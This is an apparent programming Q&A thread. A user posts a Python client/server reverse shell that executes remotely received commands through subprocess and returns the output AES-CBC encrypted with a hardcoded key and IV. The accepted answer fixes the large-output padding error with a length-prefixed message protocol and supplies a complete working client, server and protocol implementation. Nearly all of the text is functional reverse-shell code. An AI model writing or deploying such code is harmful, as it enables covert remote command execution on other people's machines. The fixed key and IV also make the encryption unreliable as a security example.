# Python cryptodome AES-CBC / subprocess large command output issues

Tags: python, shell, aes, pycryptodome

I have the following code for a simple client/server reverse shell in python3.

it will connect fine, and any command with a small output it will work great. commands like "whoami" and listing the contents of a directory with one or two files. The issue seems to be with any command that gives a large output eg) listing all files in a large directory, or the "ipconfig /all" command. This will crash the program with "ValueError: Padding is incorrect".

Im sure it is somthing simple, but i am very new to this and am unsure. Thank you

client.py

```
from Cryptodome.Cipher import AES
from Cryptodome.Util import Padding
import socket
import subprocess
key = b"H" * 32
IV = b"H" * 16

def encrypt(message):
    encryptor = AES.new(key, AES.MODE_CBC, IV)
    padded_message = Padding.pad(message, 16)
    encrypted_message = encryptor.encrypt(padded_message)
    return encrypted_message

def decrypt(cipher):
    decryptor = AES.new(key, AES.MODE_CBC, IV)
    decrypted_padded_message = decryptor.decrypt(cipher)
    decrypted_message = Padding.unpad(decrypted_padded_message, 16)
    return decrypted_message

def connect():
    s = socket.socket()
    s.connect(('192.168.0.2', 8080))
    while True:
        command = decrypt(s.recv(1024))
        if 'leave' in command.decode():
             break
        else:
            CMD = subprocess.Popen(command.decode(), shell=True, stderr=subprocess.PIPE,           stdin=subprocess.PIPE, stdout=subprocess.PIPE)
            s.send(encrypt(CMD.stdout.read()))
    

def main():
    connect()
main()
```

server.py

```
import socket

from Cryptodome.Cipher import AES
from Cryptodome.Util import Padding

IV = b"H" * 16
key = b"H" * 32

def encrypt(message):
    encryptor = AES.new(key, AES.MODE_CBC, IV)
    padded_message = Padding.pad(message, 16)
    encrypted_message = encryptor.encrypt(padded_message)
    return encrypted_message

def decrypt(cipher):
    decryptor = AES.new(key, AES.MODE_CBC, IV)
    decrypted_padded_message = decryptor.decrypt(cipher)
    decrypted_message = Padding.unpad(decrypted_padded_message, 16)
    return decrypted_message

def connect():

    s = socket.socket()
    s.bind(('192.168.0.2', 8080))
    s.listen(1)
    conn, address = s.accept()
    print('Connected')
    while True:

        command = input("Shell> ")
        if 'leave' in command:
            conn.send(encrypt(b'leave'))
            conn.close()
            break
        else:
            command = encrypt(command.encode())
            conn.send(command)
            print(decrypt(conn.recv(1024)).decode())
def main():
    connect()

main()
```

Answer (score 0, accepted):

```
    print(decrypt(conn.recv(1024)).decode())
```

The problem is that `conn.recv(1024)` only reads up to 1024 bytes, whereas the output for the bigger commands is probably more than 1024 bytes in size, leading to incomplete ciphertext being received.

Note that a single read can fewer bytes too, so we don't really know how much we have to read since TCP is a streaming protcol.

A simple fix for that is to prefix each message with ciphertext length. Using 4 bytes (32 bits) for maximum cipher text side the message looks like the following:

`[p1,p2,p3,p4][c1,c2,c3...]` where `p1..p4` are the 4 prefix bytes and `c1... cn` are the cipher text bytes.

So, now when we start reading a message, we first read 4 bytes, interpreting these as an integer gives us the size of the following cipher text.

A sample implementation:

client.py

```
import socket
import subprocess

from protocol import read_msg, write_msg


def connect():
    s = socket.socket()
    s.connect(('localhost', 4040))
    while True:
        command = read_msg(s)
        print("command %s" % command)
        if 'leave' in command.decode():
            break
        else:
            CMD = subprocess.Popen(command.decode(), shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE,
                                   stdout=subprocess.PIPE)
            write_msg(s, CMD.stdout.read())


def main():
    connect()

main()
```

crypto.py

```
from Crypto.Util import Padding
from Crypto.Cipher import AES

key = b"H" * 32
IV = b"H" * 16


def encrypt(message):
    encryptor = AES.new(key, AES.MODE_CBC, IV)
    padded_message = Padding.pad(message, 16)
    encrypted_message = encryptor.encrypt(padded_message)
    return encrypted_message


def decrypt(cipher):
    decryptor = AES.new(key, AES.MODE_CBC, IV)
    decrypted_padded_message = decryptor.decrypt(cipher)
    decrypted_message = Padding.unpad(decrypted_padded_message, 16)
    return decrypted_message
```

protocol.py

```
from crypto import encrypt, decrypt


def read_msg(s):
    max_buffer_size = 1024

    length_buffer = b""
    while True:
        if len(length_buffer) == 4:
            break
        b = s.recv(1)
        length_buffer += b
    message_length = int.from_bytes(length_buffer, "big")
    message_buffer = b""

    read_size = min(message_length, max_buffer_size)

    to_read = message_length
    while to_read != 0:
        read = s.recv(read_size)
        message_buffer += read
        to_read -= len(read)

    return decrypt(message_buffer)


def write_msg(s, message):
    encrypted_message = encrypt(message)
    message_length = len(encrypted_message)
    message_length_raw = message_length.to_bytes(4, "big")
    s.send(message_length_raw + encrypt(message))
```

server.py

```
import socket

from protocol import write_msg, read_msg


def connect():

    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(('localhost', 4040))
    s.listen(1)
    conn, address = s.accept()
    print('Connected')
    while True:

        command = input("Shell> ")
        if 'leave' in command:
            write_msg(conn, b'leave')
            conn.close()
            break
        else:
            write_msg(conn, command.encode())
            print(read_msg(conn).decode())
def main():
    connect()

main()
```

Comment: i added your implementation to both client and server and i am still having the same problem, with the padding error. can you show how you would add it to the script, excuse my lack of knowledge.

Comment: great thank you very much, that helped me to get it working.